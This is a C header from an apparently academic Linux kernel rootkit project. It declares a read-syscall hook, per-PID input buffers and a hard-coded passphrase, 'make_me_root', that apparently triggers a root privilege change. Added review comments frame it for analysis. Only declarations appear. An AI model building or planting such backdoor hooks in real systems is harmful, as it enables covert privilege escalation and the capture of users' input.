linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

read.h (480B)


/*
 * read.h - declarations for the read-hook component.
 *
 * Declares the hook install/remove entry points, the per-PID buffer record
 * and the constants used with them. Only declarations are visible in this
 * header; anything below that depends on the implementation is marked as an
 * assumption to be confirmed against the corresponding source file.
 *
 * NOTE(review): this header uses pid_t, __user, size_t and struct hlist_node
 * but contains no #include of its own, so it relies on the including file
 * having pulled in the kernel headers that provide them beforehand.
 */
#ifndef _GROUP7_READ_H
#define _GROUP7_READ_H

/*
 * Fixed, compile-time passphrase literal.
 * NOTE(review): judging by its text it presumably gates a privilege change;
 * confirm in the implementation. For analysis purposes, a hard-coded literal
 * like this is a stable string to search for in a module image or a memory
 * dump, assuming the build references it unmodified.
 */
#define PASSPHRASE          "make_me_root"
/*
 * NOTE(review): 12 equals the length of PASSPHRASE without its terminator;
 * presumably the two have to be changed together. TODO confirm.
 */
#define SHIFT_OFF           12
#define MAX_BUF             23 // Author's bound: no more than 23 bytes ever need to be saved


/*
 * Takes a PID, a pointer annotated __user and a size; the parameters are
 * unnamed in this prototype.
 * NOTE(review): the __user annotation marks the pointer as a user-space
 * address, which must not be dereferenced directly. Confirm the
 * implementation copies through the user-access helpers and bounds the
 * size_t length against the entry's int capacity (signed/unsigned mix).
 */
void handle_pid(pid_t, __user char *, size_t);
/* Installs the read hook; takes no arguments and reports no status. */
void hook_read(void);
/* Counterpart to hook_read(); takes no arguments and reports no status. */
void unhook_read(void);

/*
 * Per-PID record, linkable into a kernel hlist through its hlist member.
 * NOTE(review): capacity and iter are plain ints; presumably capacity is the
 * allocated size of str and is limited by MAX_BUF. TODO confirm, and confirm
 * who allocates and frees str.
 */
struct pid_entry {
    pid_t pid;      // PID this record belongs to
    char *str;      // Buffer that is filled incrementally (see iter)
    int capacity;   // presumably the size of str; verify against the allocator
    int iter; //Keep track of where we left off while filling str
    struct hlist_node hlist;    // List linkage for the kernel hlist API
};


#endif//_GROUP7_READ_H